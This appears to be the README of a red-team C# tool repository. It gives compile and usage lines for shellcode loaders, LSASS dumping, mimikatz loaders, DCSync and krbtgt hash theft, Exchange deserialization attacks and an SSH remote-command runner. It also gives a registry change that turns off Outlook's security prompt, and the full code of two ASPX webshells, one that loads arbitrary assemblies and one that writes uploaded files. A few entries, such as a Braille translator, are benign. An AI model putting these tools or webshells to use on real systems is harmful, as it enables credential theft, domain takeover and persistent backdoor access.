Homework-of-C-Sharp

C# code from my blog.


Shellcode.cs

Use CreateThread to run shellcode.

ShellcodeBase64.txt

Base64 of the shellcode (msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp).

ReadShellcode.cs

It will read ShellcodeBase64.txt and launch the shellcode.


DumpLsass.cs

The source code is from https://github.com/GhostPack/SafetyKatz

Some functions of the source code were removed; it is only used to dump lsass.exe to the current path.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs

SafetyKatz.cs

Used to run sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file of lsass.exe.

All code is from https://github.com/GhostPack/SafetyKatz

I just modified a few lines of code so that it can be compiled by csc.exe.

Eg.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe


GzipandBase64.cs

Used to generate the KatzCompressed string in PELoaderofMimikatz.cs.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs

PELoaderofMimikatz.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supports .NET 4.0 or later.

This code supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs

DcsyncofMimikatz.cs

This is the dcsync mode extracted from Mimikatz.

The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip

You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.

The source code supports .NET 4.0 or later.

This code supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs

Usage:

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit

DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit


SharpMimikatz_x86.cs

Reference: Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supports .NET 4.0 or later.

This code supports .NET 3.5 or later.

This is a 32-bit version.

Compile:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

or

C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs

Usage:

SharpMimikatz_x86.exe coffee exit

SharpMimikatz_x64.cs

Reference: Casey Smith's PELoader.cs

The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).

I changed it to the new version (mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).

The source code supports .NET 4.0 or later.

This code supports .NET 3.5 or later.

This is a 64-bit version.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs

Usage:

SharpMimikatz_x64.exe coffee exit

SharpPELoaderGenerater.cs

Used to generate SharpPELoader.cs.

Modified by 3gstudent

Reference: Casey Smith's PELoader.cs

Usage:

SharpPELoaderGenerater.exe <exe path>

Eg.

SharpPELoaderGenerater.exe mimikatz.exe

SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code.

More details:

"Loading PE Files in Memory via .NET"


AddMachineAccountofDomain.cs

Reference: https://github.com/pkb1s/SharpAllowedToAct

This code is just part of SharpAllowedToAct.

It can be used to add a machine account (User: testNew, Password: 123456789).

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll


mapi_tool.cs

Use MAPI to manage Outlook.

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll

Usage:
     mapi_tool.exe GetAllFolders
     mapi_tool.exe GetConfig
     mapi_tool.exe ListMail <folder>
     mapi_tool.exe ListUnreadMail <folder>
Ex command:
     mapi_tool.exe GetConfigEx
     mapi_tool.exe GetContactsEx
     mapi_tool.exe GetGlobalAddressEx  
     mapi_tool.exe ListMailEx <folder>
     mapi_tool.exe ListUnreadMailEx <folder>
     mapi_tool.exe SaveAttachment <folder> <EntryID>  
     <folder>:Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
     When the antivirus software is inactive or out-of-date, running an Ex command will pop up an Outlook security prompt.
     You can modify the registry to turn off the Outlook security prompt.
     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2

Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2010.

Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll

Use for Outlook 2013.


BrailleToASCII.cs

Used to translate Braille Patterns to ASCII characters.

Support:1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs


SSLCertScan

Used to scan a website's SSL certificate.

Reference: https://github.com/ryanries/SharpTLSScan

This code can be compiled by csc.exe or Visual Studio.

Supports .NET 3.5 or later.

Compile:

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs

or

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs

SharpSSHCheck_SSH.NET.cs

Used to check whether an SSH credential is valid (based on SSH.NET).

Supports password and private key file.

Reference: https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
      <mode>:
      - plaintext
      - keyfile

Eg:

      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
      SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa

SharpSSHRunCmd_SSH.NET

Remote command execution via SSH (based on SSH.NET).

Supports password and private key file.

Reference: https://github.com/sshnet/SSH.NET

Note:

You need to reference Renci.SshNet.dll.

You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip

Compile:

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll

Usage:

      SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
      <mode>:
      - plaintext
      - keyfile
If the <cmd> is shell, you will get an interactive shell.

Eg:

      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
      SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps

ListUserMailbyLDAP

Used to export all users' mail by LDAP.

Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll

Usage:

      ListUserMailbyLDAP <LDAP ServerIP> <user> <password>

Eg:

      ListUserMailbyLDAP.exe 192.168.1.1 test1 password1

List_passwordneverexpires_user_byLDAP

Used to export all users with password_never_expires by LDAP.

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>

Eg:

      List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1

Add_passwordneverexpires_user_byLDAP

Used to set password_never_expires on the selected user by LDAP.

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll

Usage:

      Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user> 

Eg:

      Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1

SqlClient.cs

From: https://github.com/FortyNorthSecurity/SqlClient

Used to query the MSSQL database.

Compile:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs

or

C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs

SharpADFindDemo.cs

Used to export the AD data by LDAP.

Compile:

      C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
      or
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll

Usage:

      SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
            
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname

Note: The maxsize is 1000.

Eg:

      SharpADFindDemo.exe 192.168.1.1 test1 password1 user

SharpExchangeBackdoor.cs

Python Version: SharpExchangeBackdoor.py

Used to send a payload to the Exchange webshell backdoor.

Support:

  • assemblyLoad
  • webshellWrite

Usage:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

eg.

    SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>

webshellWrite.aspx:

<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>

XamlToViewState.cs

Used to create a viewstate from a XAML file.

Usage:

    <xaml path> <generator> <key>

eg.

XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF

SerializeXamlToViewState.cs

Used to create a viewstate from serialized XAML data.

SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs

SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs

SharpExchangeDeserializeShell-NoAuth-ghostfile.cs

Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs

Used to test deserialization code execution on Exchange.

From read and write permissions on Exchange files to deserialization code execution.

You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\<path>\web.config to implement deserialization code execution.

<path>: owa or ecp

Usage:

    <url> <key> <path>

eg.

    192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
    mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp    

SharpExchangeDumpHash.cs

Used to send a payload to the Exchange webshell backdoor. The communication is encrypted with AES.

Supported functions:

  • generate : generate the webshell
  • dumplsass: save the dump file of LSASS to C:\Windows\Temp\lsass.bin
  • parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log

Usage:

    <url> <user> <password> <mode>

mode:

  • generate
  • dumplsass
  • parsedump

eg.

    SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
    SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump

SharpDCSync_krbtgt.cs

Uses the DRSR protocol to ask a domain controller for the krbtgt hash.

Reference: https://github.com/vletoux/MakeMeEnterpriseAdmin

SharpDCSync.cs

Uses the DRSR protocol to ask a domain controller to synchronize a specified entry.

Reference: https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpTGTImporter.cs

Used to import the TGT.

Reference: https://github.com/vletoux/MakeMeEnterpriseAdmin


SharpGetUserLoginIPRPC.cs

Uses RPC to get the login IP of domain users through the event log.

Supports local and remote access.

SharpGetUserLoginIPWMI.cs

Uses WMI to get the login IP of domain users through the event log.

Supports local and remote access.